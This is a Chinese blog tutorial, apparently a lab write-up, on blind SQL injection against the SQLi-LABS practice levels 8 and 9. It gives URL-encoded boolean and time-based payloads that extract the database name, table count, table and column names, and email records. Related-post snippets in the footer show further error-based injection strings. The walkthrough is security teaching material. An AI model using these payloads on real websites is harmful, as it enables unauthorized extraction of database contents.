sql注入盲注

最新推荐文章于 2022-09-29 16:23:08 发布
最新推荐文章于 2022-09-29 16:23:08 发布
阅读量176 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_50401030/article/details/108737896
本文详细介绍了两种SQL盲注技术:布尔型盲注与时间盲注。通过具体实例,逐步展示了如何利用这两种方法来获取数据库信息,包括确定数据库名称、表名、字段名及字段内容等关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  • 1.布尔型盲注(以SQLi-LABS Page-1(Basic Challenges) less8 为例子)

在这里插入图片描述

  • 1.首先判断数据库有多少位

在这里插入图片描述

大于7是成立的
在这里插入图片描述

大于8是报错的
所以数据库是8位

?id=0%27%20or%20length(database())>8%20--+

然后再查数据库名字
在这里插入图片描述
经过不断的尝试发现115是没有报错的所以第一个字母就是115对应的ascii码就是s
在这里插入图片描述
在这里插入图片描述

一个字母一个字母的试下去发现得到的是security这个数据库

?id=0%27%20or%20ascii(substr((select%20database()),2,1))=101%23

然后就是查表

?id=0%27%20or%204%20=%20(SELECT%20count(TABLE_NAME)%20FROM%20INFORMATION_SCHEMA.TABLES%20where%20TABLE_SCHEMA%20=%20database())--+

等于4的时候有回显等于其他的没有回显所以有4个表
在这里插入图片描述

?id=0%27%20or%20ascii(substr((SELECT%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.tables%20where%20TABLE_SCHEMA%20=%27security%27%20limit%200,1),1,1))%20=101--+

在这里插入图片描述
同样的道理得到表emails

和上面一样找字段的长度发现2回显3不回显得到字段的长度是2
在这里插入图片描述

?id=0%27%20or%202=(SELECT%20count(column_name)%20FROM%20INFORMATION_SCHEMA.columns%20where%20TABLE_SCHEMA=database()%20and%20table_name=%27emails%27)--+

再找出字段的名字
在这里插入图片描述

?id=0%27%20or%20ascii(substr((SELECT%20column_name%20FROM%20INFORMATION_SCHEMA.columns%20where%20TABLE_SCHEMA%20=%27security%27%20and%20table_name%20=%20%27emails%27%20limit%200,1),1,1))>60--+

不断调试找出字段名id

再找字段的内容和之前一样一步一步的找
在这里插入图片描述

?id=0%27%20or%20ascii(substr((SELECT%20`email_id`%20from%20security.emails%20limit%202,1),1,1))>65--+


得到这些即可

  • 2 时间盲注(以SQLi-LABS Page-1(Basic Challenges) less9 为例子)

?id=0' or If(ascii(substr(database(),1,1))=115,sleep(5),0)--+

在这里插入图片描述
如果有时间延迟那就是对的如果错误就没有延迟
在这里插入图片描述

只需在前面加个if其他的语句和布尔型盲注类似(这里就不过多介绍)

haozhu945
关注
DVWA靶场-SQL Injection (Blind)SQL注入
mlws1900的博客
03-19 1748
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
【DVWA】20. SQL Injection (Blind)SQL注入(全等级Sqlmap版)
Zichel77的博客
04-08 2561
,有两种主要类型,包括布尔和时间
SQL注入
weixin_56239202的博客
04-13 780
常用函数 SQL注入步骤 联合查询注入 函数与报错注入 SQL 宽字节注入 sqlmap工具 常用函数 常用系统函数 基础信息函数 功能 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 database() 数据库名 version() 数据库版本 @@datadir 数据库路径 @@basedir
sql注入常用函数
Web安全工具库
11-18 3409
​当所有情绪都堆在一起的时候,才发现自己已经不是那个一块糖就能开心的小孩子了。。。 ---- 网易云热评 一、MySql注入常用函数 1、system_user()系统用户名 2、user()用户名 3、current_user()当前用户名 4、session_user()链接数据库的用户名 5、database()数据库名 6、version()数据库版本 7、@@datadir数据库路径 8、@@basedir数据库安装路径 9、@@version_conpile_os操作系统.
url中的20%、22%、26%、28%、29%怎么解析还原成真实的字符
越来越好ing的博客
04-08 5万+
程序对url解码: import java.io.UnsupportedEncodingException; import java.net.URLDecoder; String deurl = URLDecoder.decode(url,"UTF-8"); 必须加编码UTF-8或者正文的编码GB2312 否则就会提示不推荐使用 The method decode(St...
转义字符列表
Yemy的专栏
04-01 7961
/n 回车换行 /t Tab制表符/v 竖向跳格 /b 退格 /r 回车 /f 走纸换页 // 反斜线符/ 单引号符 /a 鸣铃/" 双引号 /ddd  1~3位八进制数所代表的字符 /xhh 1~2位十六进制数所代表的字符URL特殊字符的转义特殊符号 十六进制值+ 转义符为 %2B空格 转义符为 + 或 %20/ 转义符为 %2F? 转义符为 %3F% 转义符为 %25
我的SQL注入学习:
weixin_46954909的博客
09-29 3359
经验总结
31-31.渗透测试SQL注入
最新发布
05-10
渗透测试SQL注入
SQL注入之基于布尔的详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
php文件在网站上不报错,CTF
weixin_29917533的博客
03-11 804
bugku Web WriteUp刚刚接触ctf没多久,做ctf-练习平台上的题目,有些新的题目,在网上没有找到对应的writeup,所以做了之后就想自己写一个,也顺便理理自己的思路。(没有太多经验…可能对有些题目的理解还不深刻…)签到题加群在公告里就可以看到flag值了。Web2F12,立马就看到flag的值了。文件上传测试题目说是要上传php文件,那我们先上传一个php文件,页面提示非图片文件...
2021-08-28
qq_40396048的博客
08-28 157
SQL_LABS base 5 http://172.19.0.1:8888/Less-5/?id=1%27%20and%20length(database())%20=%208%20–%20 长度为8 http://172.19.0.1:8888/Less-5/?id=1%27%20and%20ascii(substr(database(),1,1))%20=%20115%20–%20 第一个字符ascii码为115 s http://172.19.0.1:8888/Less-5/?id=1%
CTFhub-SQL注入
Moyv的博客
01-27 1万+
CTFhub-SQL注入
url中的20%、22%、26%、7B%、%7D、28%、29%怎么解析还原成真实的字符
热门推荐
透明大脑
09-21 21万+
URL编码表 backspace 8% A 41% a 61% § %A7 Õ %D5   tab 9% B 42% b 62% « %AB Ö %D6   linefeed %0A C 43% c
PHP常用爆库暴表等等语句
收集盒 Book box
07-08 1693
判断版本号(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by
LESS-5,LESS-6
qq_44598397的博客
03-16 831
LESS-5: 源码: 1、输入http://127.0.0.1/sqlilabs/Less-5/?id=1时没有出现错误: 2、输入http://127.0.0.1/sqlilabs/Less-5/?id=268,没有出现显示位,不能使用union语句 3、输入127.0.0.1/sqlilabs/Less-5/?id=1’ 进行错误分析,出现错误’’1’’LIMIT 0,1’除去收尾和自...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值